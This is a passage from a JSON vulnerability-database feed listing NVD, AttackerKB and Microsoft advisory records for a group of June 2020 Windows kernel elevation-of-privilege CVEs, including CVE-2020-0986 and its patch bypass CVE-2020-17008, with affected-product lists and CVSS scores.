"2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1262", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*"]}, {"lastseen": "2022-03-23T12:32:48", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1246", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1246", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1246", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}], "attackerkb": [{"lastseen": "2022-09-04T08:04:27", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\n**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the slpwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-0986", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "modified": "2020-07-24T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-17T05:06:46", "description": "This CVE is the result of a patch bypass for CVE-2020-0986, reported to Microsoft by Kaspersky in December 2019 and patched in June 2020. Google Project Zero researcher Maddie Stone notified Microsoft on September 24, 2020 that the fix for Kaspersky\u2019s reported vulnerability was incomplete. CVE-2020-17008 was [published on December 23, 2020](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) as part of Google\u2019s 90-day disclosure deadline.\n\nNotably, CVE-2020-0986 was exploited in the wild as part of [Operation PowerFall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Stone\u2019s tweet thread on the incomplete patch [is here](<https://twitter.com/maddiestone/status/1341781307508969473>).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-17008 splWOW64 Elevation of Privilege Patch Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-30T00:00:00", "id": "AKB:2BD24459-EE7D-4EB8-92A6-7C77689BCC8D", "href": "https://attackerkb.com/topics/cKeyeWef0b/cve-2020-17008-splwow64-elevation-of-privilege-patch-bypass", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-0986", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1276"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1276", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1276", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1316"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1316", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1316", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1273"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1273", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1275"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1275", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1275", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1264"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1264", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1264", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1274"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1274", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1274", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": 